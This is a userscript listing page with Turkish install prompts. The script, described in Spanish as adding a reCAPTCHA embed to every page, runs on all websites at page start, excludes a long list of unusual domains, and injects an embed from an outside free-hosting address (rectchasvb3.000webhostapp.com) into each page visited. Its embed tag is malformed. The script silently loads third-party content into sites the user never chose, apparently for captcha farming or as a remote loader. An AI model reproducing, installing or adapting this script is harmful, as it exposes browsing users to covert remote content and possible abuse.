https://www.paginas.com

Agrega un embed recaptcha a cada pagina que visites!

Bu betiği kurabilmeniz için Tampermonkey, Greasemonkey ya da Violentmonkey gibi bir kullanıcı betiği eklentisini kurmanız gerekmektedir.

Bu betiği yüklemek için Tampermonkey gibi bir uzantı yüklemeniz gerekir.

Bu betiği kurabilmeniz için Tampermonkey ya da Violentmonkey gibi bir kullanıcı betiği eklentisini kurmanız gerekmektedir.

Bu betiği kurabilmeniz için Tampermonkey ya da Userscripts gibi bir kullanıcı betiği eklentisini kurmanız gerekmektedir.

Bu betiği indirebilmeniz için ayrıca Tampermonkey gibi bir eklenti kurmanız gerekmektedir.

Bu komut dosyasını yüklemek için bir kullanıcı komut dosyası yöneticisi uzantısı yüklemeniz gerekecek.

(Zaten bir kullanıcı komut dosyası yöneticim var, kurmama izin verin!)

Bu stili yüklemek için Stylus gibi bir uzantı yüklemeniz gerekir.

Bu stili yüklemek için Stylus gibi bir uzantı kurmanız gerekir.

Bu stili yükleyebilmek için Stylus gibi bir uzantı yüklemeniz gerekir.

Bu stili yüklemek için bir kullanıcı stili yöneticisi uzantısı yüklemeniz gerekir.

Bu stili yüklemek için bir kullanıcı stili yöneticisi uzantısı kurmanız gerekir.

Bu stili yükleyebilmek için bir kullanıcı stili yöneticisi uzantısı yüklemeniz gerekir.

(Zateb bir user-style yöneticim var, yükleyeyim!)

// ==UserScript==
// @name         https://www.paginas.com
// @namespace    http://tampermonkey.net/
// @version      v.3
// @description  Agrega un embed recaptcha a cada pagina que visites!
// @author       antony gonzalez 04262005112
// @noframes
// @exclude      https://kolotibablo.com/*
// @exclude      https://greasyfork.org/*
// @exclude      http://autom4tic4.000webhostapp.com/*
// @exclude      https://www.mariott.com/*
// @exclude      https://www.autoscout24.de/*
// @exclude      https://services.isb.az/*
// @exclude      https://www.ourtime.com/*
// @exclude      https://localbitcoins.net/*
// @exclude      https://www.mobile.de/*
// @exclude      https://evas2.urm.lt/*
// @exclude      https://hideout.tv/*
// @exclude      https://vatstrange.com/*
// @exclude      https://trifleaardvark.com/*
// @exclude      https://revolutionaryraw.com/*
// @exclude      https://pendulumfocused.com.br/*
// @exclude      https://litigationwife.com/*
// @exclude      https://expedite.com/*
// @exclude      https://honeyydew.com/*
// @exclude      https://www.truthfinder.com/*
// @exclude      https://perpendicular.com/*
// @exclude      https://medirian.com/*
// @exclude      https://foyer.com/*
// @exclude      https://catamaranbra.com/*
// @exclude      https://trussspecials.com.uk/*
// @exclude      https://calendartangle.com/*
// @exclude      https://suitcase.com/*
// @exclude      https://leisurebeet.com/*
// @exclude      https://mileplaying.com/*
// @exclude      https://reclinerequal.com/*
// @exclude      https://www1.ticketmaster.com/*
// @exclude      https://concerts1.liven/*
// @exclude      wftc3.e-travel.com/*
// @exclude	     https://www.idax.pro/*
// @exclude      https://pointeraspen.com/*
// @exclude      https://lungfishdolce.com/*
// @exclude      https://eunex.co/*
// @exclude      https://granndparent.com/*
// @exclude      https://usgraduate.com/
// @exclude      https://tealdecennium.com/
// @exclude      https://bitrabbit.io/*
// @exclude      https://newdawnroaster.com/*
// @exclude      https://caliroots.com/*
// @exclude      https://bloggrow.com/*
// @exclude      https://birosag.hu/*
// @exclude      https://afterlife.com/*
// @include      http://*/*
// @include      https://*
// @include      http://*
// @run-at       document-start
// @grant        none
// ==/UserScript==


document.documentElement.innerHTML += ("<embed src='https://rectchasvb3.000webhostapp.com/'</embed>");